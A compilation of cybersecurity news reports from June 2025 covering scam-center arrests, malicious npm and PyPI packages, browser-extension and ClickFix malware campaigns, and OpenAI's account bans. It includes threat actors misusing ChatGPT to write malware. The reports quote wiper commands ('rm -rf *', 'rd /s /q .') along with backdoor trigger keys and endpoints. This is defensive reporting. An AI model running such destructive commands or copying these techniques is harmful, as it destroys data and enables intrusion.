Author: Mark

Jun 06, 2025The Hacker NewsCybercrime / Financial Fraud

India’s Central Bureau of Investigation (CBI) has revealed that it has arrested six individuals and dismantled two illegal call centers that were found to be engaging in a sophisticated transnational tech support scam targeting Japanese citizens.

The law enforcement agency said it conducted coordinated searches at 19 locations across Delhi, Haryana, and Uttar Pradesh on May 28, 2025, as part of an initiative called Operation Chakra V, which aims to combat cyber-enabled financial crimes.

The cybercrime syndicates, per the CBI, defrauded foreign nationals, mainly Japanese citizens, by masquerading as technical support personnel from various multinational corporations, including Microsoft.

“The syndicate operated call centers designed to appear as legitimate customer service centers, through which victims were deceived into believing that their electronic devices were compromised,” the agency said. “Under this pretext, victims were coerced into transferring funds into mule accounts.”

Authorities said they worked together with the National Police Agency of Japan and Microsoft, allowing them to track down the perpetrators of the scheme and its operational structure. In addition, valuable evidence in the form of computers, storage devices, digital video recorders, and phones has been seized.

The CBI said the operation criminal enterprise leveraged advanced social engineering techniques and “technical subterfuge” to deceive victims and extract money under false pretenses.

“With the growth of cybercrime-as-a-service, connectivity among cybercriminals has increased and become more global,” Microsoft’s Steven Masada said. “We must continue to look at the full ecosystem in which these actors operate and coordinate with multiple international partners to meaningfully address cybercrime.”

The tech giant further said it has been closely working with the Japan Cybercrime Control Center (JC3) to uncover the fake technical support scam, enabling it to take down approximately 66,000 malicious domains and URLs globally since May 2024.

The cross-sector collaboration, Redmond added, made it possible to identify the broader network behind these operations, which includes pop-up creators, search-engine optimizers, lead generators, logistics and technology providers, payment processors, and talent providers.

“These actors used generative AI to scale their operations, including to identify potential victims, automate the creation of malicious pop-up windows, and perform language translations to target Japanese victims,” Masada said.

“This activity highlights the increasingly sophisticated tactics employed by cybercriminals and underscores the importance of proactive global collaboration to protect victims. “

The action comes shortly after Reuters reported that the recently disclosed data breach at Coinbase has links to India-based customer support representatives at TaskUs, who the threat actors bribed to steal customer data from the cryptocurrency exchange.

The breach is said to have been first identified in January 2025, with TaskUs stating that it had fired two employees after they illegally accessed information from a Coinbase around the same time. Coinbase has since terminated its contract with the company.

The developments also follow the arrest of 20 suspects across 12 countries between March and May 2025 in an international operation on charges of creating and distributing child sexual abuse material (CSAM).

“Spanish authorities arrested seven suspects, including a healthcare worker and a teacher,” INTERPOL said. “The healthcare worker allegedly paid minors from Eastern Europe for explicit images, while the teacher is accused of possessing and sharing child sexual abuse material via various online platforms.”

Another 10 suspects have been arrested from different Latin American countries, including three in El Salvador and a teacher in Panama. The remaining arrests took place in Europe and the United States. INTERPOL said that 68 additional suspects have been identified and further investigations are currently ongoing globally.

OpenAI has revealed that it banned a set of ChatGPT accounts that were likely operated by Russian-speaking threat actors and two Chinese nation-state hacking groups to assist with malware development, social media automation, and research about U.S. satellite communications technologies, among other things.

“The [Russian-speaking] actor used our models to assist with developing and refining Windows malware, debugging code across multiple languages, and setting up their command-and-control infrastructure,” OpenAI said in its threat intelligence report. “The actor demonstrated knowledge of Windows internals and exhibited some operational security behaviors.”

The Go-based malware campaign has been codenamed ScopeCreep by the artificial intelligence (AI) company. There is no evidence that the activity was widespread in nature.

The threat actor, per OpenAI, used temporary email accounts to sign up for ChatGPT, using each of the created accounts to have one conversation to make a single incremental improvement to their malicious software. They subsequently abandoned the account and moved on to the next.

This practice of using a network of accounts to fine-tune their code highlights the adversary’s focus on operational security (OPSEC), OpenAI added.

The attackers then distributed the AI-assisted malware through a publicly available code repository that impersonated a legitimate video game crosshair overlay tool called Crosshair X. Users who ended up downloading the trojanized version of the software had their systems infected by a malware loader that would then proceed to retrieve additional payloads from an external server and execute them.

“From there, the malware was designed to initiate a multi-stage process to escalate privileges, establish stealthy persistence, notify the threat actor, and exfiltrate sensitive data while evading detection,” OpenAI said.

“The malware is designed to escalate privileges by relaunching with ShellExecuteW and attempts to evade detection by using PowerShell to programmatically exclude itself from Windows Defender, suppressing console windows, and inserting timing delays.”

Among other tactics incorporated by ScopeCreep include the use of Base64-encoding to obfuscate payloads, DLL side-loading techniques, and SOCKS5 proxies to conceal their source IP addresses.

The end goal of the malware is to harvest credentials, tokens, and cookies stored in web browsers, and exfiltrate them to the attacker. It’s also capable of sending alerts to a Telegram channel operated by the threat actors when new victims are compromised.

OpenAI noted that the threat actor asked its models to debug a Go code snippet related to an HTTPS request, as well as sought help with integrating Telegram API and using PowerShell commands via Go to modify Windows Defender settings, specifically when it comes to adding antivirus exclusions.

The second group of ChatGPT accounts disabled by OpenAI are said to be associated with two hacking groups attributed to China: APT5 (aka Bronze Fleetwood, Keyhole Panda, Manganese, and UNC2630) and APT15 (aka Flea, Nylon Typhoon, Playful Taurus, Royal APT, and Vixen Panda)

While one subset engaged with the AI chatbot on matters related to open-source research into various entities of interest and technical topics, as well as to modify scripts or troubleshooting system configurations.

“Another subset of the threat actors appeared to be attempting to engage in development of support activities including Linux system administration, software development, and infrastructure setup,” OpenAI said. “For these activities, the threat actors used our models to troubleshoot configurations, modify software, and perform research on implementation details.”

This consisted of asking for assistance building software packages for offline deployment and advice pertaining to configured firewalls and name servers. The threat actors engaged in both web and Android app development activities.

In addition, the China-linked clusters weaponized ChatGPT to work on a brute-force script that can break into FTP servers, research about using large-language models (LLMs) to automate penetration testing, and develop code to manage a fleet of Android devices to programmatically post or like content on social media platforms like Facebook, Instagram, TikTok, and X.

Some of the other observed malicious activity clusters that harnessed ChatGPT in nefarious ways are listed below –

• A network, consistent with the North Korea IT worker scheme, that used OpenAI’s models to drive deceptive employment campaigns by developing materials that could likely advance their fraudulent attempts to apply for IT, software engineering, and other remote jobs around the world
• Sneer Review, a likely China-origin activity that used OpenAI’s models to bulk generate social media posts in English, Chinese, and Urdu on topics of geopolitical relevance to the country for sharing on Facebook, Reddit, TikTok, and X
• Operation High Five, a Philippines-origin activity that used OpenAI’s models to generate bulk volumes of short comments in English and Taglish on topics related to politics and current events in the Philippines for sharing on Facebook and TikTok
• Operation VAGue Focus, a China-origin activity that used OpenAI’s models to generate social media posts for sharing on X by posing as journalists and geopolitical analysts, asking questions about computer network attack and exploitation tools, and translating emails and messages from Chinese to English as part of suspected social engineering attempts
• Operation Helgoland Bite, a likely Russia-origin activity that used OpenAI’s models to generate Russian language content about the German 2025 election, and criticized the U.S. and NATO, for sharing on Telegram and X
• Operation Uncle Spam, a China-origin activity that used OpenAI’s models to generate polarized social media content supporting both sides of divisive topics within U.S. political discourse for sharing on Bluesky and X
• Storm-2035, an Iranian influence operation that used OpenAI’s models to generate short comments in English and Spanish that expressed support for Latino rights, Scottish independence, Irish reunification, and Palestinian rights, and praised Iran’s military and diplomatic prowess for sharing on X by inauthentic accounts posing as residents of the U.S., U.K., Ireland, and Venezuela.
• Operation Wrong Number, a likely Cambodian-origin activity related to China-run task scam syndicates that used OpenAI’s models to generate short recruitment-style messages in English, Spanish, Swahili, Kinyarwanda, German, and Haitian Creole that advertised high salaries for trivial tasks such as liking social media posts

“Some of these companies operated by charging new recruits substantial joining fees, then using a portion of those funds to pay existing ’employees’ just enough to maintain their engagement,” OpenAI’s Ben Nimmo, Albert Zhang, Sophia Farquhar, Max Murphy, and Kimo Bumanglag said. “This structure is characteristic of task scams.”

Cybersecurity researchers have flagged a supply chain attack targeting over a dozen packages associated with GlueStack to deliver malware.

The malware, introduced via a change to “lib/commonjs/index.js,” allows an attacker to run shell commands, take screenshots, and upload files to infected machines, Aikido Security told The Hacker News, stating these packages collectively account for nearly 1 million weekly downloads.

The unauthorized access could then be used to perform various follow-on actions like mining cryptocurrency, stealing sensitive information, and even shutting down services. Aikido said the first package compromise was detected on June 6, 2025, at 9:33 p.m. GMT.

The list of the impacted packages and the affected versions is below –

• @gluestack-ui/utils version 0.1.16 (101 Downloads)
• @gluestack-ui/utils version 0.1.17 (176 Downloads)
• @react-native-aria/button version 0.2.11 (174 Downloads)
• @react-native-aria/checkbox version 0.2.11 (577 Downloads)
• @react-native-aria/combobox version 0.2.8 (167 Downloads)
• @react-native-aria/disclosure version 0.2.9 (N/A)
• @react-native-aria/focus version 0.2.10 (951 Downloads)
• @react-native-aria/interactions version 0.2.17 (420 Downloads)
• @react-native-aria/listbox version 0.2.10 (171 Downloads)
• @react-native-aria/menu version 0.2.16 (54 Downloads)
• @react-native-aria/overlay version 0.3.16 (751 Downloads)
• @react-native-aria/radio version 0.2.14 (570 Downloads)
• @react-native-aria/slider version 0.2.13 (264 Downloads)
• @react-native-aria/switch version 0.2.5 (56 Downloads)
• @react-native-aria/tabs version 0.2.14 (170 Downloads)
• @react-native-aria/toggle version 0.2.12 (589 Downloads)
• @react-native-aria/utils version 0.2.13 (341 Downloads)

Furthermore, the malicious code injected into the packages is similar to the remote access trojan that was delivered following the compromise of another npm package “rand-user-agent” last month, indicating that the same threat actors could be behind the activity.

The trojan is an updated version that supports two new commands to harvest system information (“ss_info”) and the public IP address of the host (“ss_ip”).

The project maintainers have since revoked the access token and marked the impacted versions as deprecated. Users who may have downloaded the malicious versions are recommended to roll back to a safe version to mitigate any potential threats.

“The potential impact is massive in scale, and the malware’s persistence mechanism is particularly concerning – attackers maintain access to infected machines even after maintainers update the packages,” the company said in a statement.

However, in an incident report published on June 9, 2025, the project maintainers acknowledged that a public access token associated with one of their contributors was compromised, thereby allowing threat actors to publish tampered versions of react-native-aria packages along with a @gluestack-ui/utils package to npm.

“The compromised package was published by a compromised account of an authorized maintainer,” Suraj Ahmed Choudhury said. “React Native ARIA is a frontend-only library. It does not execute any code in CLI or scripts post-install, meaning the likelihood of the malicious code executing on user systems is extremely low to none. Based on our current understanding and usage patterns, no system-level compromises are expected.”

The maintainers also said they have also revoked GitHub repository access for all non-essential contributors, and enabled two-factor authentication (2FA) for publishing and GitHub access.

Malicious Packages Found on npm Unleash Destructive Features

The development comes as Socket discovered two rogue npm packages – express-api-sync and system-health-sync-api – that masquerade as legitimate utilities but implant wipers that can delete entire application directories.

Published by the account “botsailer” (email: anupm019@gmail[.]com), the packages were downloaded 112 and 861 times, respectively, before being taken down.

The first of the two packages, express-api-sync, claims to be an Express API to sync data between two databases. However, once installed and added by an unsuspecting developer to their application, it triggers the execution of malicious code upon receiving an HTTP request with a hard-coded key “DEFAULT_123.”

Upon receipt of the key, it executes the Unix command “rm -rf *” to recursively delete all files from the current directory and below, including source code, configuration files, assets, and local databases.

The other package is a lot more sophisticated, acting both as an information stealer and a wiper, while also modifying its deletion commands based on whether the operating system is Windows (“rd /s /q .”) or Linux (“rm -rf *”).

“Where express-api-sync is a blunt instrument, system-health-sync-api is a Swiss Army knife of destruction with built-in intelligence gathering,” security researcher Kush Pandya said.

A notable aspect of the npm package is that it uses email as a covert communication channel, connecting to the attacker-controlled mailbox via hard-coded SMTP credentials. The password is obfuscated using Base64-encoding, whereas the username points to an email address with a domain that’s associated with a real estate agency based in India (“auth@corehomes[.]in”).

“Every significant event triggers an email to anupm019@gmail[.]com,” Socket said. “The email includes the full backend URL, potentially exposing internal infrastructure details, development environments, or staging servers that shouldn’t be publicly known.”

The use of SMTP for data exfiltration is sneaky as most firewalls do not block outbound email traffic, and allows malicious traffic to blend in with legitimate application emails.

Furthermore, the package resisters endpoints at “/_/system/health” and “/_/sys/maintenance” to unleash the platform-specific destruction commands, with the latter acting as a fallback mechanism in case the main backdoor is detected and blocked.

“Attackers first verify the backdoor via GET /_/system/health which returns the server’s hostname and status,” Pandya explained. “They can test with dry-run mode if configured, then execute destruction using POST /_/system/health or the backup POST /_/sys/maintenance endpoint with the key “HelloWorld.”

The discovery of the two new npm packages shows that threat actors are beginning to branch out beyond using bogus libraries for information and cryptocurrency theft to focus on system sabotage — something of an unusual development as they offer no financial benefits.

PyPI Package Poses as Instagram Growth Tool to Harvest Credentials

It also comes as the software supply chain security firm discovered a new Python-based credential harvester imad213 on the Python Package Index (PyPI) repository that claims to be an Instagram growth tool. According to statistics published on pepy.tech, the package has been downloaded 3,242 times.

“The malware uses Base64-encoding to hide its true nature and implements a remote kill switch through a Netlify-hosted control file,” Pandya said. “When executed, it prompts users for Instagram credentials, and broadcasts them to ten different third-party bot services while pretending to boost follower counts.”

The Python library has been uploaded by a user named im_ad__213 (aka IMAD-213), who joined the registry on March 21, 2025, and has uploaded three other packages that can harvest Facebook, Gmail, Twitter, and VK credentials (taya, a-b27) or leverage Apache Bench to target streaming platforms and APIs with distributed denial-of-service (DDoS) attacks (poppo213).

The list of packages, which are still available for download from PyPI, is below –

• imad213 (3,242 Downloads)
• taya (930 Downloads)
• a-b27 (996 Downloads)
• poppo213 (3,165 Downloads)

In a GitHub README.md document published by IMAD-213 about two days before “imad213” was uploaded to PyPI, the threat actor claims that the library is mainly for “educational and research purposes” and notes that they are not responsible for any misuse.

The GitHub description also includes a “deceptive safety tip,” urging users to utilize a fake or temporary Instagram account to avoid running into any issues with their main account.

“This creates false security, users think they’re being cautious while still handing over valid credentials to the attacker,” Pandya said.

Once launched, the malware connects to an external server and reads a text file (“pass.txt”) and proceeds further with the execution only if the file content matches the string “imad213.” The kill switch can serve multiple purposes, allowing the threat actor to determine who gets access to run the library or turn off every downloaded copy by simply changing the context of the control file.

In the next step, the library prompts the user to enter their Instagram credentials, which are then saved locally in a file named “credentials.txt” and broadcast to ten different dubious bot service websites, some of which link to a network of Turkish Instagram growth tools likely operated by the same entity. The domains were registered in June 2021.

“The emergence of this credential harvester reveals concerning trends in social media-targeted malware,” Socket said. “With ten different bot services receiving credentials, we’re seeing the early stages of credential laundering – where stolen logins are distributed across multiple services to obscure their origin.”

Jun 08, 2025Ravie LakshmananMalware / Browser Security

Cybersecurity researchers have shed light on a new campaign targeting Brazilian users since the start of 2025 to infect users with a malicious extension for Chromium-based web browsers and siphon user authentication data.

“Some of the phishing emails were sent from the servers of compromised companies, increasing the chances of a successful attack,” Positive Technologies security researcher Klimentiy Galkin said in a report. “The attackers used a malicious extension for Google Chrome, Microsoft Edge, and Brave browsers, as well as Mesh Agent and PDQ Connect Agent.”

The Russian cybersecurity company, which is tracking the activity under the name Operation Phantom Enigma, said the malicious extension was downloaded 722 times from across Brazil, Colombia, the Czech Republic, Mexico, Russia, and Vietnam, among others. As many as 70 unique victim companies have been identified. Some aspects of the campaign were disclosed in early April by a researcher who goes by the alias @johnk3r on X.

The attack starts with phishing emails disguised as invoices that trigger a multi-stage process to deploy the browser extension. The messages encourage recipients to download a file from an embedded link or open a malicious attachment contained within an archive.

Present within the files is a batch script that’s responsible for downloading and launching a PowerShell script, which, in turn, performs a series of checks to determine if it’s running in a virtualized environment and the presence of a software named Diebold Warsaw.

Developed by GAS Tecnologia, Warsaw is a security plugin that’s used to secure banking and e-commerce transactions through the Internet and mobile devices in Brazil. It’s worth noting that Latin American banking trojans like Casbaneiro have incorporated similar features, as disclosed by ESET in October 2019.

The PowerShell script is also engineered to disable User Account Control (UAC), set up persistence by configuring the aforementioned batch script to be launched automatically upon system reboot, and establish a connection with a remote server to await further commands.

The list of supported commands is as follows –

• PING – Send a heartbeat message to the server by sending “PONG” in response
• DISCONNECT – Stop the current script process on the victim’s system
• REMOVEKL – Uninstall the script
• CHECAEXT – Check the Windows Registry for the presence of a malicious browser extension, sending OKEXT if it exists, or NOEXT, if the extension is not found
• START_SCREEN – Install the extension in the browser by modifying the ExtensionInstallForcelist policy, which specifies a list of apps and extensions that can be installed without user interaction

The detected extensions (identifiers: nplfchpahihleeejpjmodggckakhglee, ckkjdiimhlanonhceggkfjlmjnenpmfm, and lkpiodmpjdhhhkdhdbnncigggodgdfli) have already been removed from the Chrome Web Store.

Other attack chains swap the initial batch script for Windows Installer and Inno Setup installer files that are utilized to deliver the extensions. The add-on, per Positive Technologies, is equipped to execute malicious JavaScript code when the active browser tab corresponds to a web page associated with Banco do Brasil.

Specifically, it sends the user’s authentication token and a request to the attackers’ server to receive commands to likely display a loading screen to the victim (WARTEN or SCHLIEBEN_WARTEN) or serve a malicious QR code on the bank’s web page (CODE_ZUM_LESEN). The presence of German words for the commands could either allude to the attacker’s location or that the source code was repurposed from somewhere else.

In what appears to be an effort to maximize the number of potential victims, the unknown operators have found to leverage invoice-related lures to distribute installer files and deploy remote access software such as MeshCentral Agent or PDQ Connect Agent instead of a malicious browser extension.

Positive Technologies said it also identified an open directory belonging to the attacker’s auxiliary scripts containing links with parameters that included the EnigmaCyberSecurity identifier (“<victim-domain>/about.php?key=EnigmaCyberSecurity”).

“The study highlights the use of rather unique techniques in Latin America, including a malicious browser extension and distribution via Windows Installer and Inno Setup installers,” Galkin said.

“Files in the attackers’ open directory indicate that infecting companies was necessary for discreetly distributing emails on their behalf. However, the main focus of the attacks remained on regular Brazilian users. The attackers’ goal is to steal authentication data from the victims’ bank accounts.”

Cybersecurity researchers are alerting to a new malware campaign that employs the ClickFix social engineering tactic to trick users into downloading an information stealer malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems.

The campaign, according to CloudSEK, has been found to leverage typosquat domains mimicking U.S.-based telecom provider Spectrum.

“macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” security researcher Koushik Pal said in a report published this week. “The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”

It’s believed that the activity is the work of Russian-speaking cybercriminals owing to the presence of Russian language comments in the malware’s source code.

The starting point of the attack is a web page that impersonates Spectrum (“panel-spectrum[.]net” or “spectrum-ticket[.]net”). Visitors to the sites in question are served a message that instructs them to complete a hCaptcha verification check to in order to “review the security” of their connection before proceeding further.

However, when the user clicks the “I am human” checkbox for evaluation, they are displayed an error message stating “CAPTCHA verification failed,” urging them to click a button to go ahead with an “Alternative Verification.”

Doing so causes a command to be copied to the users’ clipboard and the victim is shown a set of instructions depending on their operating system. While they are guided to run a PowerShell command on Windows by opening the Windows Run dialog, it’s substituted by a shell script that’s executed by launching the Terminal app on macOS.

The shell script, for its part, prompts users to enter their system password and downloads a next-stage payload, in this case, a known stealer called Atomic Stealer.

“Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure,” Pal said.

“The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction ‘Press & hold the Windows Key + R’ was displayed to both Windows and Mac users.”

The disclosure comes amid a surge in campaigns using the ClickFix tactic to deliver a wide range of malware families over the past year.

“Actors carrying out these targeted attacks typically utilize similar techniques, tools, and procedures (TTPs) to gain initial access,” Darktrace said. “These include spear phishing attacks, drive-by compromises, or exploiting trust in familiar online platforms, such as GitHub, to deliver malicious payloads.”

The links distributed using these vectors typically redirect the end user to a malicious URL that displays a fake CAPTCHA verification check in an attempt to deceive users into thinking that they are carrying out something innocuous, when, in reality, they are guided to execute malicious commands to fix a non-existent issue.

The end result of this effective social engineering method is that users end up compromising their own systems, enabling threat actors to bypass security controls.

The cybersecurity company said it identified multiple ClickFix attacks across customer environments in Europe, the Middle East, and Africa (EMEA), and in the United States. And these campaigns are gaining steam, adopting several variations but operating with the same end goal of delivering malicious payloads, ranging from trojans to stealers to ransomware.

Earlier this week, Cofense outlined an email phishing campaign that spoofs Booking.com, targeting hotel chains and the food services sector with fake CAPTCHAs that lead to XWorm RAT, PureLogs Stealer, and DanaBot. The fact that ClickFix is flexible and easy to adapt makes it an attractive malware distribution mechanism.

“While the exact email structure varies from sample to sample, these campaigns generally provide Booking[.]com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers,” Cofense said.

The email security firm said it has also observed ClickFix samples mimicking cookie consent banners, wherein clicking on the “Accept” button causes a malicious script file to be downloaded. The user is subsequently prompted to run the script to accept cookies.

In one April 2025 incident analyzed by Darktrace, unknown threat actors were found to utilize ClickFix as an attack vector to download nondescript payloads to burrow deeper into the target environment, conduct lateral movement, send system-related information to an external server via an HTTP POST request, and ultimately exfiltrate data.

“ClickFix baiting is a widely used tactic in which threat actors exploit human error to bypass security defenses,” Darktrace said. “By tricking endpoint users into performing seemingly harmless, everyday actions, attackers gain initial access to systems where they can access and exfiltrate sensitive data.”

Other ClickFix attacks have employed phony versions of other popular CAPTCHA services like Google reCAPTCHA and Cloudflare Turnstile for malware delivery under the guise of routine security checks.

These fake pages are “pixel-perfect copies” of their legitimate counterparts, sometimes even injected into real-but-hacked websites to trick unsuspecting users. Stealers such as Lumma and StealC, as well as full-fledged remote access trojans (RATs) like NetSupport RAT are some of the payloads distributed via bogus Turnstile pages.

“Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” SlashNext’s Daniel Kelley said. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.”

Jun 09, 2025Ravie LakshmananCybersecurity / Hacking News

Behind every security alert is a bigger story. Sometimes it’s a system being tested. Sometimes it’s trust being lost in quiet ways—through delays, odd behavior, or subtle gaps in control.

This week, we’re looking beyond the surface to spot what really matters. Whether it’s poor design, hidden access, or silent misuse, knowing where to look can make all the difference.

If you’re responsible for protecting systems, data, or people—these updates aren’t optional. They’re essential. These stories reveal how attackers think—and where we’re still leaving doors open.

⚡ Threat of the Week

Google Releases Patches for Actively Exploited Chrome 0-Day — Google has released Google Chrome versions 137.0.7151.68/.69 for Windows and macOS, and version 137.0.7151.68 for Linux to address a high-severity out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine that it said has been exploited in the wild. Google credited Clement Lecigne and Benoît Sevens of Google Threat Analysis Group (TAG) with discovering and reporting the flaw on May 27, 2025. “Out-of-bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page,” according to a description of the flaw. It’s currently not known how the flaw is being exploited in the wild, although it’s likely to be highly targeted in nature.

• PathWiper Used in Attack on Ukraine — An unnamed critical infrastructure entity within Ukraine was targeted by a previously unseen data wiper malware named PathWiper, which shares similarities with another wiper codenamed HermeticWiper that was used by the Russia-linked Sandworm hacking group at the outset of the Russo-Ukrainian war in early 2022. “The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, which was then used to issue malicious commands and deploy PathWiper across connected endpoints,” Cisco Talos said.
• BladedFeline Targets Iraq with Whisper and Spearal Malware — An Iran-aligned hacking group dubbed BladedFeline has been attributed to a new set of cyber attacks targeting Kurdish and Iraqi government officials in early 2024. BladedFeline, believed to be active since at least September 2017, is suspected to be a sub-cluster within OilRig, a well-known state-sponsored threat actor that’s assessed to be affiliated with Iran’s Ministry of Intelligence and Security (MOIS) and operational for over a decade. The attacks leverage an as-yet-undetermined initial access vector to deliver backdoors like Whisper (aka Veaty), Spearal, and Optimizer.
• Vishing Group UNC6040 Targets Salesforce with Fake Data Loader App — A previously undocumented threat actor known as UNC6040 has leveraged voice phishing techniques reminiscent of Scattered Spider to breach targets of interest by posing as IT support personnel and trick employees into installing a modified version of Salesforce’s Data Loader app in order to obtain unauthorized access to their Salesforce data and exfiltrate it. The attacks are said to overlap with a loose-knit cybercrime collective known as The Com, of which the Scattered Spider threat actor is a part. Salesforce said the observed incidents primarily relied on manipulating end users, and that it did not involve the exploitation of any security vulnerability in its systems.
• Chrome to Distrust Certs Issued by Chunghwa Telecom and Netlock — Google’s Chrome security team has announced plans to distrust digital certificates issued by Chunghwa Telecom and Netlock citing “patterns of concerning behavior observed over the past year.” The changes are expected to be introduced in Chrome 139, which is scheduled for public release in early August 2025. “Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports,” Google said. “When these factors are considered in the aggregate and considered against the inherent risk each publicly-trusted CA poses to the internet, continued public trust is no longer justified.” It’s worth noting that Apple has already moved to distrust root CA certificate “NetLock Arany (Class Gold) Főtanúsítvány” effective November 15, 2024.
• Android Trojan Crocodilus Broadens Focus Beyond Spain and Turkey — A nascent Android banking trojan called Crocodilus is stealthily spreading onto Android devices around the world via fake banking apps, phony browser updates, and malicious ads promising fake rewards. While early campaigns mainly targeted Android users in Turkey, the malware has surfaced on devices in Poland, Spain, South America, and parts of Asia, signaling a sharp uptick in both its reach and sophistication. The malware now includes the ability to create new contacts in the victim’s address book, likely for social engineering, and to automatically harvest cryptocurrency wallet seed phrases from infected Android devices. Crocodilus is the latest reminder of malware authors continuing to adapt and trying to find new ways to get around Google’s defenses and infect Android devices, even as Google has been constantly adding a steady stream of new security features to counter the rising tide of malware faced by the ecosystem. Intel 471, in a report last week, highlighted an increase in Android malware incorporating hidden virtual network computing (HVNC), keylogging, and remote control functionalities, and a decrease in web injects. “While web injects remain at moderate levels, keyloggers that exploit Android’s accessibility services have become increasingly popular for harvesting sensitive data,” the company said. “Once this information is collected, malware operators often deploy HVNC to reconstruct the infected device’s screen on the server side, providing a real-time view of the victim’s activity.” This spike has also been complemented by a growing number of malware strains that are capable of bypassing Android 13 accessibility restrictions for sideloaded apps.

‎️‍🔥 Trending CVEs

Attackers love software vulnerabilities – they’re easy doors into your systems. Every week brings fresh flaws, and waiting too long to patch can turn a minor oversight into a major breach. Below are this week’s critical vulnerabilities you need to know about. Take a look, update your software promptly, and keep attackers locked out.

This week’s list includes — CVE-2025-20286 (Cisco Identity Services Engine), CVE-2025-49113 (Roundcube), CVE-2025-5419 (Google Chrome), CVE-2025-21479, CVE-2025-21480, CVE-2025-27038 (Qualcomm), CVE-2025-37093 (HPE StoreOnce), CVE-2025-48866 (ModSecurity WAF), CVE-2025-25022 (IBM QRadar Suite), CVE-2025-22243 (VMware NSX Manager), CVE‑2025‑24364, CVE‑2025‑24365 (Vaultwarden), and CVE-2024-53298 (Dell PowerScale OneFS).

📰 Around the Cyber World

• SentinelOne Blames Outage on Software Flaw — American cybersecurity company SentinelOne revealed that a massive outage that took place on May 29, 2025, and lasted about seven hours was triggered by a software flaw that caused network routes and DNS resolver rules to be deleted. The outage affected multiple customer-facing services in what the company described as a global service disruption. “During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data,” it said. The root cause of the issue, it added, was a “software flaw in an infrastructure control system that removed critical network routes, causing widespread loss of network connectivity within the SentinelOne platform.”
• Nigeria Jails 9 Chinese Nationals for Being Part of a Cybercrime Syndicate — The Federal High Court of Nigeria convicted nine Chinese nationals and sentenced them each to a year in prison for their roles in a cybercrime syndicate that allegedly involved training and recruiting young Nigerians to commit online fraud such as romance baiting scams. The individuals were arrested in December 2024 as part of an operation codenamed Eagle Flush, which resulted in the arrest of 599 Nigerians and 193 other foreign nationals, many of them Chinese, on suspicion of being involved in a range of online crimes and frauds. In February 2025, several Chinese and Filipino nationals were arraigned on charges of cyber-terrorism, possession of documents containing false pretense, and identity theft. They are said to be among the 792-member cryptocurrency investment and romance fraud suspects arrested in December 2024. China’s ambassador to Nigeria, Yu Dunhai, has proposed sending a working group to Nigeria to work with the country’s law enforcement agencies to dismantle Chinese cybercrime rings engaging in telecom frauds. “I can assure you […] that we have zero tolerance for this kind of crime. The Chinese government has always been committed to countering cybercrime and telecom frauds,” said Dunhai.
• Bogus Airdrops Target Hashgraph Network Users — The U.S. Federal Bureau of Investigation (FBI) warned that scammers are targeting Hedera Hashgraph network users through the NFT airdrop feature embedded in non-custodial wallets to steal cryptocurrency using free rewards as lures. “The Hedera Hashgraph is the distributed ledger used by Hedera. The airdrop feature was originally created by the Hedera Hashgraph network for marketing purposes; however, cybercriminals can exploit this tactic to collect victim data to steal cryptocurrency,” the FBI said. The agency further noted that cyber criminals may advertise the malicious phishing URLs for fraudulent NFT airdrop rewards tokens on social media or through a third-party website. Alternatively, the threat actors may also send an email with a booby-trapped link that, when clicked, requests the victim to enter their credentials to collect the free tokens. However, this action allows them to gain unauthorized access to the wallets and drain the funds.
• Threat Actors Use Fake Caching Plugin to Steal WordPress Admin Credentials — Bad actors have been found to leveraging a bogus WordPress caching plugin named wp-runtime-cache to harvest admin credentials and exfiltrate them to an external server (“woocommerce-check[.]com”) that masquerades as WooCommerce, an open-source e-commerce plugin for WordPress. While it’s currently not clear how the attackers managed to compromise the site, typical methods involve exploitation of known security flaws in plugins and themes, or stolen admin credentials (which is unlikely the case in this attack, given it’s exfiltrated to the attackers post infection). “As demonstrated here, once an attacker has gained access to a site it can be quite easy to hide their malicious activities,” Sucuri said. “This attack highlights the importance of auditing your site’s plugins and users, and maintaining updated admin passwords.”
• Chinese Hackers Breached U.S. Telecom Company in Summer 2023 — Chinese hackers broke into the systems of an unnamed U.S. telecommunications company in the summer of 2023 and stayed there for seven months before the breach was discovered, Bloomberg reported. The intrusion has been attributed to the Salt Typhoon, which attracted attention late last year for its targeting of U.S. telecom firms. The incident indicates that Chinese attackers penetrated the U.S. communications system earlier than publicly known. China, however, denied the allegations, urging relevant parties to “stop spreading all kinds of disinformation about the so-called Chinese hacking threats.”
• German Data Protection Watchdog Fines Vodafone — Germany’s Federal Commissioner for Data Protection and Freedom of Information (BfDI) imposed two fines totaling €45 million ($51.4 million) on Vodafone for privacy and security violations. “Due to malicious employees in partner agencies who broker contracts to customers on behalf of Vodafone, there had been fraud cases due to fictitious contracts or contract changes at the expense of customers, among other things,” BfDI said. Of the €45 million penalty, €30 million was imposed for security issues in the authentication process associated with MeinVodafone (“My Vodafone”) and its Vodafone Hotline. “The identified authentication vulnerabilities enabled, among other things, unauthorized third parties to access eSIM profiles,” authorities said. Vodafone has updated its systems to mitigate such risks in the future, the BfDI added.
